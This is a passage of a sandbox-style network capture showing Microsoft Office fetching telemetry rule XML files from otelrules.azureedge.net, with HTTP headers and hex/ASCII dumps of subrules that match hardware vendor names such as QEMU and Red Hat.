                                                  2024-10-13 17:34:27 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  94192.168.2.44986113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3CAEBB8"
                                                  x-ms-request-id: cda1fd3a-301e-0096-2fde-1ae71d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cfbd7pgux3k6qfa60000000043g0000000084tc
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  95192.168.2.44985813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D30478D"
                                                  x-ms-request-id: 94508d5b-e01e-0052-6824-1ad9df000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cfspvtq2pgqb2w5k0000000055g000000002g9a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  96192.168.2.44985913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:26 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:26 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3F48DAE"
                                                  x-ms-request-id: a84dc0aa-d01e-002b-1b83-1b25fb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173426Z-17db6f7c8cfp6mfve0htepzbps00000004qg0000000033d8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  97192.168.2.44986213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:27 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                  ETag: "0x8DC582BB5284CCE"
                                                  x-ms-request-id: 2da2c30a-901e-005b-13dd-1b2005000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173427Z-17db6f7c8cf8rgvlb86c9c009800000003cg000000004wm2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  98192.168.2.44986413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:27 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                  ETag: "0x8DC582B91EAD002"
                                                  x-ms-request-id: 24028bf8-401e-00a3-4b1c-1c8b09000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173427Z-17db6f7c8cfpm9w8b1ybgtytds000000030g00000000h3bz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  99192.168.2.44986513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:27 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 432
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                  ETag: "0x8DC582BAABA2A10"
                                                  x-ms-request-id: 581fb33a-501e-00a0-339b-1b9d9f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173427Z-17db6f7c8cf9wwz8ehu7c5p33g00000002h0000000005ghn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  100192.168.2.44986613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:27 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA740822"
                                                  x-ms-request-id: 5c2b82db-e01e-0071-3c2b-1c08e7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173427Z-17db6f7c8cf9wwz8ehu7c5p33g00000002m0000000000bvp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:27 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  101192.168.2.44986713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:27 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:28 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                  ETag: "0x8DC582BB464F255"
                                                  x-ms-request-id: ca6815b7-a01e-0053-63aa-1c8603000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173427Z-17db6f7c8cfjxfnba42c5rukwg000000025000000000bqvd
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  102192.168.2.44986813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:29 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:29 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA4037B0D"
                                                  x-ms-request-id: eb876971-601e-0001-084f-1cfaeb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173429Z-17db6f7c8cfcrfgzd01a8emnyg00000002p000000000danz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  103192.168.2.44986913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:29 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:29 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6CF78C8"
                                                  x-ms-request-id: 7d3f2e15-101e-00a2-5aca-1a9f2e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173429Z-17db6f7c8cfnqpbkckdefmqa440000000590000000004hkb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  104192.168.2.44987113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:29 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:29 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 405
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                  ETag: "0x8DC582B942B6AFF"
                                                  x-ms-request-id: 67a092be-301e-0099-76e2-1a6683000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173429Z-17db6f7c8cfqkqk8bn4ck6f72000000004yg00000000auec
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
